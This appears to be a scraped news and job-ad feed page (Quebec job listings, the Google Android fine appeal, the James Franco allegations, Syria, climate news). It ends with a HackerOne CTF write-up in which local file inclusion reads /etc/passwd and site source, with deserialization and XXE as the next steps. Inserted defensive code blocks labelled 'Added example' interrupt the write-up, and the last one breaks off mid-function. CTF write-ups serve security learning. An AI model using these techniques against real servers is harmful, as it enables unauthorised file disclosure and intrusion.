    From OSL Retail Services Inc - Fri, 21 Sep 2018 19:19:46 GMT - View all Joliette, QC jobs
              Wireless Sales Associate - Drummondville - OSL Retail Services Inc - Drummondville, QC
    Then OSL is for you. Walmart Canada has partnered with OSL to operate its 350 wireless stores across Canada and we are in full...
    From OSL Retail Services Inc - Thu, 12 Jul 2018 01:18:36 GMT - View all Drummondville, QC jobs
              Google appeals record €4.3 billion Android fine (spokesperson)
    Brussels - Google on Tuesday appealed the record €4.34 billion fine imposed on it in July by the EU over the dominant position of its Android smartphone operating system, the group announced...
              Busy Philipps Accuses James Franco of Assaulting Her on Set

    The actress becomes the sixth woman to accuse Franco of misconduct or exploitation.

    By Ariel Sobel

    In her upcoming memoir, actress Busy Philipps accuses Freaks and Geeks costar James Franco of physically assaulting her on set.

    A passage from This Will Only Hurt a Little, which was obtained by Radar Online, then verified by other publications, details how in 1999 Philipps was directed to hit Franco lightly on the chest during a scene. Afterward, Franco stopped acting.

    "He grabbed both my arms and screamed in my face, 'DON'T EVER TOUCH ME AGAIN!'" Philipps recalls. "And he threw me to the ground. Flat on my back. Wind knocked out of me."

    Franco then stormed off while the crew ran over to help her back to her feet, according to Philipps. He apologized to her the next day after being told to do so by the director and producers, but he was never punished for his action, she writes.

    Franco's representatives did not respond to a request for comment from Variety.

    Earlier this year, when Franco was the front-runner for the Best Actor Oscar for his performance in The Disaster Artist, five women came forward to accuse him of inappropriate behavior and exploitation on and off set. One woman, Violet Paley, tweeted that Franco forced her head toward his exposed penis in a car, and also said he preyed on her underage friend. Sarah Tither-Kaplan claimed that Franco said she was contractually obligated to be fully nude on set for $100 per day.


    Days after posing with a "Time's Up" pin at the Golden Globes, where he took home an award, Franco denied the allegations on The Late Show With Stephen Colbert.

    “The things that I heard that were on Twitter are not accurate, but I completely support people coming out and being able to have a voice because they didn’t have a voice for so long,” Franco told the host. 

    In her book, Philipps calls Franco a "fucking bully." She had previously discussed the alleged assault in a 2016 appearance on Watch What Happens Live, where she noted that she and Franco "really, really disliked each other" during the run of Freaks and Geeks but had later made amends.

    "He felt like he wanted his character to be one way. He had had a discussion with the producers that he came from an abused family or something, and so he didn't want his girlfriend — I played his girlfriend — to ever physically hit him," Philipps said on the late-night show. "I never knew this conversation existed, and in an improv, I smacked him on the thing, and he was like, 'Don't ever touch me,' and grabbed me and shoved me to the ground. It was an overreaction by a 19-year-old dude. And it was weird and people's agents had to be called and he had to apologize to me."

    While promoting her book, Philipps also opened up on The Ellen DeGeneres Show about being raped at 14. In the same episode, host DeGeneres discussed her own experience of being molested when she was 15.

    This Will Only Hurt a Little goes on sale October 16.

              Mining Fleet Analyst - Toromont Cat (Québec) - Val-d'Or, QC
    Provide recommendations to reduce the operating costs of our client's Caterpillar equipment....
    From Toromont - Fri, 28 Sep 2018 16:42:57 GMT - View all Val-d'Or, QC jobs
              iOS 11 is no more, Apple no longer signs it

    Last night, at 7 p.m. in France, Apple sprang a surprise by releasing iOS 12.0.1 for download. It will please a great many people, since it fixes the few bugs in iOS 12, notably the Wi-Fi and charging problems. But the arrival of a new version of the operating system for the firm's mobile devices […]
              Turkey 'Saber-Rattling' on US-Backed Militia in Syria
    Turkey is threatening to eradicate the People's Protection Units (YPG) militia in Syria. But such a move would put it on a collision course with the United States, which backs the Syrian Kurdish group as a key ally in the war against Islamic State and in curtailing Iran's influence.

    President Recep Tayyip Erdogan said Turkey's army will sweep the YPG from its border. Ankara claims the militia is linked to the Kurdistan Workers' Party (PKK), which is waging a decades-long insurgency for Kurdish autonomy in Turkey.

    In an address to parliament last week, Erdogan vowed the destruction of the YPG, and slammed Washington for its armed support of the group. "The United States has sent nearly 19,000 trucks [loaded with arms] to the YPG and PYD [Democratic Union Party] in northern Syria," Erdogan said. "Who will they use these arms against? We demanded to buy weapons from you, and you rejected [that]. However, you are giving those arms to terrorist groups."

    The YPG, with U.S. military backing, seized control of a broad swath of Syrian territory that runs east of Syria's Euphrates River to the Iraqi frontier. The region borders Turkey, and Ankara claims YPG control of this territory is an intolerable security threat. Turkey's forces have been steadily building up a presence close to strategic YPG towns. Its hardening rhetoric coincides with the U.S. indicating it will remain in Syria after IS is defeated. "We're not going to leave as long as Iranian troops are outside Iranian borders, and that includes Iranian proxies and militias," White House National Security Advisor John Bolton said at last month's U.N. General Assembly.

    Former senior Turkish diplomat Aydin Selcen, who served in Washington and in the region, said he believes the YPG has become key to U.S. objectives in the area. "Now, the U.S.' main struggle in the region is with Iran," Selcen said. "And this particular triangle region to the east of the Euphrates is of high importance when it comes to stopping Iranian presence in the Middle East. I don't see how the U.S. can do anything about the YPG presence east of the Euphrates near the Turkish border." He added that pushing the militia away from the Turkish border also is not viable. "All the towns [under YPG control] are aligned along the Turkish border," he said. "So you cannot ask the YPG to leave those towns, as they will have to go to the desert areas, which is not feasible."

    Iran and Russia have been quick to exploit the apparent standoff between Turkey and the U.S. Last month, Russian Foreign Minister Sergei Lavrov said, "The main danger to Syria's territorial integrity originates from the eastern bank of the Euphrates, where independent and autonomous structures are created under the direct control of the United States." Analysts say Iran and Russia share Turkey's concern over U.S. backing of the YPG. And they suggest a decision by the group's political wing, the PYD, earlier this month to end talks with Damascus likely was influenced by Washington's renewed commitment to remain in Syria.

    While backing rival sides in the Syrian civil war, Turkey has found common ground with Iran and Russia to resolve the conflict. At the same time, Moscow and Tehran are widely seen to be using that cooperation to try and draw Ankara away from Washington. Turkey already controls a large swath of Syrian territory from previous military operations against the YPG. But analysts suggest the Syrian government, Iran and Russia would likely hesitate to support the Turkish army further extending its control of Syria, even if it meant ousting U.S. forces.

    Saber rattling

    Despite Turkey's heightened rhetoric and military presence on the Syria border, there is a suspicion it remains just saber rattling. "There was an increase in forces from the Turkish side near Tel Abyad [a YPG-controlled Syrian town] and what Mr. Erdogan said any military operation could be imminent in the east of the Euphrates," Selcen said. "To me, this was not very probable because it would bring two NATO members — Turkey and the U.S. — face to face in Syria."

    The threat of military action could be just leverage on the U.S., sharply criticized by Turkey for its slow response to enforcing an agreed road map for the YPG to withdraw from the strategic Syrian city of Manbij. "Manbij remains an open wound in Turkish-U.S. relations," said international relations expert Soli Ozel of Istanbul's Kadir Has University. "The previous U.S. administration promised Ankara YPG forces would leave the city after its capture from Islamic State, a commitment it failed to honor."

    In a move that could dial down tensions, Turkey's Defense Minister Hulusi Akar announced this week that joint patrols by Turkish and U.S. forces would start in Manbij. Erdogan had accused Washington of foot-dragging in honoring a commitment to begin the patrols, seen by Turkey as an essential step toward removing the YPG from Manbij. Despite Turkey's fiery rhetoric, analysts say cooperation with the U.S. is continuing in Syria, and as a senior Western diplomat pointed out, Turkey continues to accommodate U.S. forces' heavy reliance on its critical Incirlik airbase for Syrian operations.
              Foreman/Forewoman, EVF - ArcelorMittal Exploitation minière Canada s.e.n.c. - Port-Cartier, QC
    Manages the equipment fleet at the EVF, which includes movements between the Port, the garage and the various crews along the track;...
    From ArcelorMittal Exploitation minière Canada s.e.n.c. - Fri, 05 Oct 2018 20:47:03 GMT - View all Port-Cartier, QC jobs
              The daily business briefing: October 9, 2018

    1.

    Google parent Alphabet is shutting down its Google+ social network to consumers after data from up to 500,000 users appeared to have been exposed to external developers due to a bug, the company announced in a blog on Monday. Google said it detected the problem and patched the leak in March. The company also said there was no evidence that any developers misused user data or exploited the vulnerability. Still, shares of Alphabet dropped by more than 1 percent on the news of the latest privacy glitch to affect a major tech company. The company reportedly plans to "wind down" Google+, which has "very low usage" among consumers anyway, by August 2019. It will be kept alive for businesses. [Reuters]

    2.

    New Fox, the successor to Fox News parent company 21st Century Fox, on Monday named President Trump's former White House communications director, Hope Hicks, as its head of corporate communications. Hicks, 29, will run communications for a company overseeing Fox News, the Fox broadcasting network, and other outlets under the control of Rupert Murdoch. Hicks' hiring is the latest in a series of moves linking Fox News personnel and the White House. Bill Shine, the network's former co-president, became White House deputy chief of staff for communications, effectively replacing Hicks. New Fox is the company emerging from 21st Century Fox's sale of many assets to Walt Disney Co. [The Washington Post]

    3.

    President Trump plans Tuesday to issue a directive allowing the year-round sale of gasoline containing more ethanol, up to 15 percent, in a move to keep a campaign promise to farmers, The Wall Street Journal reported, citing a senior White House official. Gasoline with 15 percent ethanol, known as E15, currently is banned in summer to cut smog. The change is intended to help expand the use of biofuels, but could escalate tensions with the oil industry. As a concession, Trump also is expected to propose changes to a program letting oil refiners buy and sell credits for using ethanol. After the announcement, Trump will travel to leading corn and ethanol producing state Iowa for a political rally, the White House official said. [The Wall Street Journal, MarketWatch]

    4.

    Alphabet's Google on Tuesday is unveiling the third edition of its Pixel smartphone. The company is holding 10 media events across the world in a sign that it will expand distribution of the devices in a bid to take on Apple's popular iPhone. Most of the world's smartphones operate on Google's free Android software, and the company has been pushing into the hardware business over the last three years hoping to increase its control over revenue from its apps. Google has been successful selling lower-priced smart speakers, but it shipped just 2.5 million Pixel 2 and 2 XL devices in the nine months that ended on June 30, giving it less than 1 percent of the global smartphone market. [Reuters]

    5.

    The International Monetary Fund on Monday downgraded its outlook for the world economy due to rising interest rates and trade tensions. The IMF forecast 3.7 percent growth for the global economy in 2018, down from a July estimate of 3.9 percent growth. European and Asian stocks were mixed on Tuesday after the news. In the U.S., stock-index futures edged down. Futures for the Dow Jones Industrial Average dropped by 0.2 percent early Tuesday, while those of the S&P 500 were down by 0.3 percent. U.S. stocks pared early losses on Monday, with the Dow eking out a narrow gain and the S&P 500 closing nearly flat, while the Nasdaq Composite fell by 0.7 percent. [The Associated Press]


              10 things you need to know today: October 9, 2018

    1.

    President Trump used a White House ceremonial swearing-in for Supreme Court Justice Brett Kavanaugh to further politicize the judge's confirmation by calling allegations of sexual misconduct against him "a campaign of political and personal destruction based on lies and deception." Trump apologized to Kavanaugh "on behalf of our nation" for what he earlier called a "hoax" orchestrated by Democrats. He declared that Kavanaugh had been "proven innocent" in an investigation, although it reached no conclusions. Kavanaugh, whose confirmation faced intense protests, sought to ease partisan tensions by promising to "take this office with gratitude and no bitterness," saying the confirmation battle "did not change me." "My approach to judging remains the same: A good judge must be an umpire, a neutral and impartial decider that favors no litigant or policy," he said. [The Washington Post]

    2.

    Hurricane Michael continued intensifying on Monday and early Tuesday, with forecasters warning it could grow into a "potentially catastrophic storm" more powerful than previously thought before making landfall in the Florida Panhandle on Wednesday. The storm reached hurricane status on Monday after its top sustained winds went from 35 miles per hour to 75 mph over 24 hours. Its top winds reached 90 mph early Tuesday. The National Hurricane Center warned Michael could make landfall as a major hurricane — a Category 3 with top sustained winds of roughly 120 mph. Florida Gov. Rick Scott (R) ordered thousands of coastal residents to head inland and others to prepare to evacuate as forecasters issued a hurricane warning for the northeastern Gulf Coast from the Alabama-Florida border to Suwanee River, Florida. [USA Today]

    3.

    Newly confirmed Supreme Court Justice Brett Kavanaugh joins the other eight members of the high court on Tuesday to hear his first arguments as a justice. The confirmation of Kavanaugh, who is considered reliably conservative, to replace retired moderate conservative Anthony Kennedy, caps a decades-long push by Republicans to secure a solidly conservative 5-4 majority on the Supreme Court. Court watchers will be looking at any questions Kavanaugh may ask, seeking indications of how his presence will shift the balance on the court. Kavanaugh missed the first week of the court's new session due to a hearing and FBI investigation on sexual misconduct allegations against him. He was confirmed Saturday in a 50-48 vote, the narrowest confirmation of a justice since 1881. [The Associated Press]

    4.

    President Trump said Monday that he has no plans to fire Deputy Attorney General Rod Rosenstein, batting down for the time being any speculation that he intended to get rid of the official overseeing Special Counsel Robert Mueller's investigation into Russia's election meddling and possible collusion by Trump campaign associates. Rumors that Rosenstein would quit or be fired began circulating after reports that he had suggested last year secretly recording conversations with Trump, and invoking the 25th Amendment to remove Trump from office. After talking with Rosenstein for about half an hour aboard Air Force One, Trump said the two had a "very good talk" and got along "very well." [USA Today]

    5.

    Turkish President Recep Tayyip Erdogan on Monday demanded that Saudi Arabia provide proof that missing self-exiled Saudi journalist Jamal Khashoggi left the Saudi consulate in Istanbul on his own. Khashoggi went into the consulate on Friday to pick up a document that would have permitted him to remarry the next day, but he hasn't been seen since. Erdogan's statement marked an escalation in diplomatic tensions between Turkey and Saudi Arabia over the case. Turkish officials say they believe Saudi agents killed Khashoggi inside the consulate. "Do you not have cameras and everything of the sort?" Erdogan said, directing his question to Saudi officials. "They have all of them. Then why do you not prove this? You need to prove it." [The Washington Post]

    6.

    New Fox, the successor to Fox News parent company 21st Century Fox, on Monday named President Trump's former White House communications director, Hope Hicks, as its head of corporate communications. Hicks, 29, will run communications for a company overseeing Fox News, the Fox broadcasting network, and other outlets under the control of Rupert Murdoch. Hicks' hiring is the latest in a series of moves linking Fox News personnel and the White House. Bill Shine, the network's former co-president, became White House deputy chief of staff for communications, effectively replacing Hicks. New Fox is the company emerging from 21st Century Fox's sale of many assets to Walt Disney Co. [The Washington Post]

    7.

    Google is shutting down its Google+ social network to consumers after data from up to 500,000 users appeared to have been exposed to external developers due to a bug, the company announced in a blog on Monday. Google said it detected the problem and patched the leak in March. The company also said there was no evidence that any developers misused user data or exploited the vulnerability. Still, shares of Google parent Alphabet dropped by more than 1 percent on the news of the latest privacy glitch to affect a major tech company. The company reportedly plans to "wind down" Google+, which has "very low usage" among consumers anyway, by August 2019. It will be kept alive for businesses. [Reuters]

    8.

    The limousine that crashed in upstate New York over the weekend, killing 20 people, failed an inspection last month, and the driver lacked the license he needed to legally operate the vehicle, New York Gov. Andrew Cuomo (D) said Monday. An aunt of one of the victims said she texted concerns about the "terrible condition" of the limousine less than 20 minutes before it sped through an intersection, struck and killed two pedestrians, and slammed into a parked vehicle. All 18 people in the limo were killed. It was taking them to a birthday celebration. [USA Today]

    9.

    The death toll from the 5.9-magnitude earthquake that hit northwestern Haiti over the weekend rose to at least 15 people on Monday, according to updated official figures. Another 333 people were reported injured. Thousands of people in the region's biggest city, Port-de-Paix, dragged mattresses out of their homes and slept outside after the quake and a 5.2-magnitude aftershock stoked panic in a country still traumatized by a deadly 7.2-magnitude earthquake that devastated the Caribbean nation's capital, Port-au-Prince, and nearby cities in 2010. Port-de-Paix is about 10 miles from the Saturday earthquake's epicenter. Many people in the city were afraid to return to cinderblock homes cracked by the temblors. [The Associated Press]

    10.

    Bulgarian authorities are investigating whether the rape and murder of Viktoria Marinova, a 30-year-old Bulgarian journalist, was related to her work. Marinova, who was killed Saturday in the northeastern city of Ruse, recently had become the anchor of a talk show focused on investigative reporting. She was the third reporter killed in Europe over the last year. The European Union promised to support the investigation by Bulgarian authorities. Bulgarian Interior Minister Mladen Marinov said, however, that there was no evidence yet that Marinova was killed over her work. Bulgarian national radio reported that a suspect had been arrested in connection with the slaying. [The Washington Post, The Associated Press]


              Computer Engineering Intern - Analyst-Programmer - Rio Tinto - Saguenay, QC
    Computer Engineering Intern - Analyst-Programmer · Excellent opportunity to join a global organization at the forefront of operations...
    From Rio Tinto - Fri, 21 Sep 2018 10:59:14 GMT - View all Saguenay, QC jobs
              China remains the world's biggest greenhouse gas emitter, while Australia ranks as 13th biggest emitter.

    Australia defies climate warning to back coal

    • 9 October 2018
    [Image: Truck being loaded with coal in Australia (Getty Images). Caption: Coal provides about 60% of Australia's electricity]
    The Australian government has backed coal-fired power, despite the recommendations of a major report on climate change.
    Phasing out coal is considered crucial to limiting global warming to within 1.5C, as set out in the UN report released yesterday.
    Australia's deputy prime minister has said the country should "absolutely" continue to use and exploit its coal.
    But China remains the world's biggest coal consumer.
    The Guardian reports that Michael McCormack, Australia's Deputy PM, said his government would not change policy "just because somebody might suggest that some sort of report is the way we need to follow and everything that we should do".
    He added that coal provided 60% of Australia's electricity, 50,000 jobs and was the country's biggest export.
    [Graphic: what is likely to be affected by different rises in temperature]
    Australia's Environment Minister Melissa Price told ABC radio that the IPCC was "drawing a long bow" by calling for an end to coal by 2050, and touted new technologies as a way of saving the polluting fuel.
    The climate report was produced by the UN's Intergovernmental Panel on Climate Change (IPCC). It warned that "unprecedented" changes would be required to limit the Earth's temperature rise, and predicted that catastrophic species loss and extreme weather would result if the target was exceeded.
    It said that coal-fired power generation had to end by 2050 in order to avoid devastating changes to the planet.
    The coal lobby is pushing a technology known as carbon capture and storage (CCS) as a solution. CCS involves capturing the CO2 produced by burning fossil fuels such as coal and trapping it deep underground.
    The IPCC agrees that CCS must become widespread. But many analysts say that progress on the technology is too slow to allow the necessary emissions reduction goals to be achieved. 
    In addition, renewable energy technologies are becoming cheaper than conventional coal-fired power generation - a trend that's likely to continue.
    Meanwhile, China is reported to possess some 993 gigawatts of coal power capacity, although the approved new plants would increase this by 25%.
    China's central government has tried to rein in this boom by issuing suspension orders for more than 100 power plants. But the report based on satellite imagery suggests that these efforts have not been totally effective.
    China remains the world's biggest greenhouse gas emitter, while Australia ranks as 13th biggest emitter.

              An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider

    Business Insider

    A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities stemming back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...
    Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to act (TechCrunch)

              Machinist - Groupe SFP ressources humaines - Fermont, QC
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* is the world's number one steel and mining company and has more than 220,000 employees... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              US slow to protect itself from cyberattack - report
    The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
              Record €4.34 billion fine for Android: Google decides to appeal
    Last July, Google was hit with a record fine of €4.34 billion in Europe over Android. The group was accused of abusing its dominant position with its mobile operating system, and more specifically with the services bundled into it. Three months later, Google announces that it has lodged an appeal before the …



              Gillian Anderson backs calls for ‘huge’ Antarctic wildlife sanctuary

    Gillian Anderson has backed calls for the creation of the largest protected area on Earth in the Antarctic Ocean. The X Files and The Fall star joined Greenpeace to hand in a petition to the UK Government signed by more than 350,000 people urging protection of a vast area of Antarctic waters.

    Greenpeace is calling for a 1.8 million square kilometer ocean sanctuary, which would be a safe haven to wildlife including penguins, whales and seals, to be created at a meeting of governments in Tasmania later this month. They were joined to hand in the petition at the Foreign and Commonwealth Office in London by one of the penguin sculptures which have been spotted “marching” for protection in cities around the world. The petition backing a sanctuary in the Weddell Sea, to protect its wildlife and habitats from damaging activities such as large-scale fishing, has been signed by two million people worldwide.

    Anderson, a Greenpeace Antarctic ambassador, said: “Sadly we have been all too quick to exploit our global oceans, and all too slow to protect them. “Despite scientists agreeing we urgently need massive ocean sanctuaries to protect marine life, progress is glacially slow. “That’s why I support Greenpeace’s campaign to create a huge Antarctic Ocean sanctuary.”

    Louisa Casson, of Greenpeace’s Protect the Antarctic campaign, said: “It’s easy to feel remote from the other side of the planet, but what happens in the Antarctic affects us all. “This month, governments have the opportunity to create the largest protected area on Earth – an Antarctic Ocean sanctuary – which would be a safe haven for penguins, whales and seals, put the area off-limits to industrial fishing and help to tackle climate change.

    [Embedded tweet] In two weeks, governments will meet to decide whether to create a vast Antarctic Ocean Sanctuary! 🐧 Now’s the time to make a difference >> https://t.co/AgbtwzSk1D pic.twitter.com/bZB3BIyWh3 — Greenpeace (@Greenpeace) October 9, 2018

    “The Antarctic doesn’t have a voice, but we are a global movement of over two million people and we do,” she said. Ms Casson welcomed the Government’s support for ocean protection and said 350,000 people were calling on UK officials to do everything they could to protect Antarctic waters at the meeting this month.

    Alan Duncan, Foreign Office minister for the polar regions, said: “The UK has been unwavering in our commitment to establish marine protected areas in Antarctica and we are using our voice internationally to make the case for practical action.”

    The post Gillian Anderson backs calls for ‘huge’ Antarctic wildlife sanctuary appeared first on London Glossy Post.


              Part-Time Professor - Network Systems and Components - Durham College - Oshawa, ON
    This is a necessary foundation for further investigations and the testing of remedial actions covered in the Access Controls, Hacking & Exploits and Network...
    From Durham College - Wed, 26 Sep 2018 07:27:59 GMT - View all Oshawa, ON jobs
              Study of migrant sex workers
    Press Release – University of Otago Wednesday, 10 October 2018 University of Otago, Christchurch releases first study of migrant sex workers The majority of migrant sex workers in New Zealand who participated in new University of Otago research, are in safe employment situations and working to fund study or travel rather than being desperate, exploited […]
              RCMP - Various administrative positions - CR-04, CR-05, AS-01 - Casual inventory - Government of Canada - Saskatchewan
    Experience operating a human resources information management system such as PeopleSoft. Royal Canadian Mounted Police.... $47,729 - $51,518 a year
    From Government of Canada - Sun, 07 Oct 2018 05:05:04 GMT - View all Saskatchewan jobs
              Brief: Méthanor: half-year profit up
    A company specialising in the financing and operation of agricultural anaerobic digestion units and in renewable energy, Méthanor posted a net profit of +172.5 Keuros in the first half of 2018, up 37% on the first...
              Capturing the HackerOne Flag

    by Daniel Abeles & Shay Shavit

    HackerOne is a bug bounty platform that allows hackers around the world to participate in bug bounty campaigns initiated by HackerOne's customers. Recently, HackerOne announced they would be hosting a special live hacking event in Buenos Aires alongside a week-long security conference, Ekoparty 14.

    In order to participate in the special event, you either have to be a top-ranked hacker on their platform, or solve a challenge. Although we don't intend to fly from Israel to Argentina, challenges, especially capture the flag (CTF) challenges, really excite us.

    We heard about the CTF from HackerOne's tweet, and immediately set our sights on the prize. The CTF started from the tweet itself, which contained an image with a QR code:



    The QR code represented the following string:



    The characters looked familiar, and we immediately suspected they were URL-encoded bytes, so we inserted a '%' before every pair of hex characters:

    %68%74%74%70%73%3a%2f%2f%68%31%2d%35%34%31%31%2e%68%31%63%74%66%2e%63%6f%6d

    We decoded the string using Burp Suite's decoder to reveal the URL (https://h1-5411.h1ctf.com):

    From there, we started exploring the website:



    The website was a meme generation service. In order to test its capability, we picked a template from a closed set of images and created our own meme. The capability was presented at the following page:


    The page allows users to choose between text and image types of memes; after entering the top and bottom text, we hit the GENERATE button, and the resulting image/text was shown at the bottom.

    Once a meme is generated, it is added to a list of memes stored in the session. All the memes are reflected on the "memes.php" page.

    We took a closer look at the generation request and noticed that the response contained a JSON string with the local meme path on the remote server (we couldn't control the "meme_path" value, since it was auto-generated by the server).



    We tried to manipulate some fields with no success. We thought the "template" field might be vulnerable to Local File Inclusion since its URL indicated it was a file. Instead of supplying a template, we tried to pull the "/etc/passwd" file. Success!



    After we validated the vulnerability, we had the ability to reflect local files from the server to the memes page. Using this vulnerability, our next step was to pull the website's source code. We started by pulling the "index.php" file:
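The file inclusion above works because the "template" value is used as a path. For contrast, here is an added example (not the challenge's code) of how a template parameter can be resolved so that it can never reach a file outside the templates directory: an allow-list of known template names plus a realpath containment check. The directory layout, file names and the helper names are hypothetical.

```python
# Added example (not the challenge's code): resolving a user-supplied
# "template" name so that it can never leave the templates directory.
# Directory, file and function names below are hypothetical.
import os
import tempfile
from typing import Optional


def is_contained(templates_dir: str, requested: str) -> bool:
    """True if `requested`, joined to templates_dir, still resolves inside it.

    realpath() collapses "../" segments and follows symlinks, so traversal,
    absolute paths and a symlink planted inside the directory are all caught.
    """
    base = os.path.realpath(templates_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        return os.path.commonpath([base, candidate]) == base
    except ValueError:            # different drives on Windows, etc.
        return False


def resolve_template(templates_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of the requested template, or None.

    Two independent controls are applied, so that a failure of one does
    not by itself open the door:
      1. an allow-list built from the files actually shipped as templates;
      2. the containment check above.
    """
    base = os.path.realpath(templates_dir)
    allowed = {
        name for name in os.listdir(base)
        if name.endswith((".jpg", ".png")) and os.path.isfile(os.path.join(base, name))
    }
    if requested not in allowed:
        return None
    if not is_contained(base, requested):
        return None
    return os.path.realpath(os.path.join(base, requested))


def demo() -> dict:
    """Create a throwaway templates directory and exercise the resolver.

    Returns a mapping of requested name -> accepted (bool).
    """
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "cat.jpg"), "wb") as f:
            f.write(b"not really a jpeg")   # constructed stand-in for a template
        requests = [
            "cat.jpg",              # legitimate template
            "../../etc/passwd",     # traversal, as in the write-up
            "/etc/passwd",          # absolute path
            "secret.txt",           # not a template at all
        ]
        return {r: resolve_template(d, r) is not None for r in requests}
```

The allow-list alone would already reject the traversal strings; the containment check is kept as a second, independent control because allow-lists tend to drift (a wildcard added later, a directory listing that includes a symlink). A request rejected by either check is worth logging, since a "template" value that looks like a path is a strong signal of probing.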



    Once we had succeeded in pulling "index.php", we iteratively pulled every PHP file referenced in the source code, resulting in an almost complete dump of the site. Some code was not pulled with this method, since it was not referenced from other pages:



    We examined the source code, and the "headers.php" file caught our attention. It had two lines commented out, the import and export memes PHP files, which looked like they belonged to the 2.0 version of the site:



    These pages were still available on the website:



    We inspected the "export" functionality. A brief examination of the export function showed the ability to download your entire meme collection in a "memepak" format. We opened the file, which contained base64 encoded data from a PHP serialized array:


    This immediately gave us a hint that we might be facing a deserialization vulnerability. One method of exchanging data between a client and a server is object serialization. When the client requests a programmatic resource, the server can turn that resource into a string (serialization) and hand it over to the client. The process also works in the opposite direction: creating an object from a string is called "deserialization".

    In PHP, in order to unserialize an object, the PHP interpreter must be familiar with the class information. This meant we could only serialize primitives (like integers) or defined classes (arrays, custom classes).

    Besides the interpreter being familiar with the classes, we needed to meet two objectives to complete a successful deserialization attack:

    Have some sort of control on data that was input to the class

    A sink function (magic function) that could reference the input data and be triggered natively by the system (like "__toString", "__construct", etc).
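Both objectives depend on the import endpoint accepting serialized objects at all. The following added example (not the challenge's code) is a small reader for PHP's serialize() format that refuses any object record, so an import handler can check a "memepak" before it reaches unserialize(). The two sample memepaks are constructed for this example; the class name in the second one is arbitrary, the scanner rejects any O: or C: record regardless of class.

```python
# Added example (not the challenge's code): a reader for PHP's serialize()
# format that refuses any object, so an import endpoint can check a
# "memepak" before it ever reaches unserialize(). Samples are constructed.
import base64
from typing import Any, Tuple


class SerializedObjectFound(Exception):
    """Raised when an O: (object) or C: (custom serializable) record is seen."""


def _read(buf: bytes, pos: int) -> Tuple[Any, int]:
    """Decode one value starting at pos; return (value, position after it)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag == b"b":                                   # b:1;
        end = buf.index(b";", pos)
        return buf[pos + 2:end] == b"1", end + 1
    if tag == b"i":                                   # i:42;
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    if tag == b"d":                                   # d:0.5;
        end = buf.index(b";", pos)
        return float(buf[pos + 2:end]), end + 1
    if tag == b"s":                                   # s:<len>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])              # declared byte length
        start = colon + 2                             # skip :"
        data = buf[start:start + length]
        if buf[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match payload")
        return data.decode("utf-8", "replace"), start + length + 2
    if tag == b"a":                                   # a:<n>:{key value ...}
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        p = colon + 2                                 # skip :{
        items = {}
        for _ in range(count):
            key, p = _read(buf, p)
            val, p = _read(buf, p)
            items[key] = val
        if buf[p:p + 1] != b"}":
            raise ValueError("array not terminated")
        return items, p + 1
    if tag in (b"O", b"C"):
        raise SerializedObjectFound(f"object record at offset {pos}")
    raise ValueError(f"unknown type tag {tag!r} at offset {pos}")


def parse_php_serialized(raw: bytes) -> Any:
    """Parse a whole serialize() payload made of scalars and arrays only."""
    value, end = _read(raw, 0)
    if end != len(raw):
        raise ValueError("trailing data after serialized value")
    return value


def memepak_is_safe(memepak_b64: str) -> bool:
    """True only if the memepak decodes to an object-free PHP array."""
    try:
        raw = base64.b64decode(memepak_b64, validate=True)
        value = parse_php_serialized(raw)
    except (SerializedObjectFound, ValueError, IndexError):
        return False
    return isinstance(value, dict)


# Constructed sample: what a legitimate export of one meme could look like.
BENIGN_MEMEPAK = base64.b64encode(
    b'a:1:{i:0;a:2:{s:8:"template";s:7:"cat.jpg";'
    b's:9:"meme_path";s:14:"memes/0001.png";}}'
).decode()

# Constructed sample: same array shape, but one element is an object record.
OBJECT_MEMEPAK = base64.b64encode(
    b'a:1:{i:0;O:8:"stdClass":1:{s:4:"note";s:7:"example";}}'
).decode()
```

In PHP itself the equivalent guard is `unserialize($data, ['allowed_classes' => false])` (PHP 7 and later), which turns any object record into `__PHP_Incomplete_Class` instead of instantiating it; replacing the format with JSON removes the magic-method sink entirely. A pre-check like the one above is still useful for logging: a memepak that contains an object record is never something the export function would have produced.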

    On the "classes.php" file we extracted before, we found 3 defined classes:

    Template

    Maintenance

    ConfigFile

    The Maintenance class was commented out, with a comment stating it belonged to an internal service, which made it a dead end.

    ConfigFile was the most interesting class, since it contains the "__toString" magic function. "__toString" executed the parse function, loading an external XML file, which could lead to an XML External Entity processing vulnerability (XXE).

    In the process of parsing the XML, the parser goes through the input and reaches an external entity. It then tries to retrieve the content of the entity. This can expose the application to various risks, such as information disclosure, server-side request forgery and internal network port scanning, among other issues.
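The retrieval step is the whole problem, so the defensive counterpart is to refuse a DOCTYPE before any entity can be declared, let alone resolved. This added example (not the challenge's code) does that with the standard-library expat parser and only then hands the document to ElementTree; the sample documents are constructed and the file URL in the second one is a placeholder.

```python
# Added example (not the challenge's code): accept only XML that carries no
# DOCTYPE and declares no entities, then parse it. Samples are constructed.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class ForbiddenXML(Exception):
    """Raised for a DOCTYPE or entity declaration in untrusted input."""


def reject_dtd(data: bytes) -> None:
    """Scan with expat and abort at the first DOCTYPE or entity declaration.

    Nothing is resolved or fetched here: the handlers fire as soon as the
    declaration is seen, before any entity reference could be expanded.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE for {name!r} is not allowed")

    def on_entity_decl(*_args):
        raise ForbiddenXML("entity declarations are not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)


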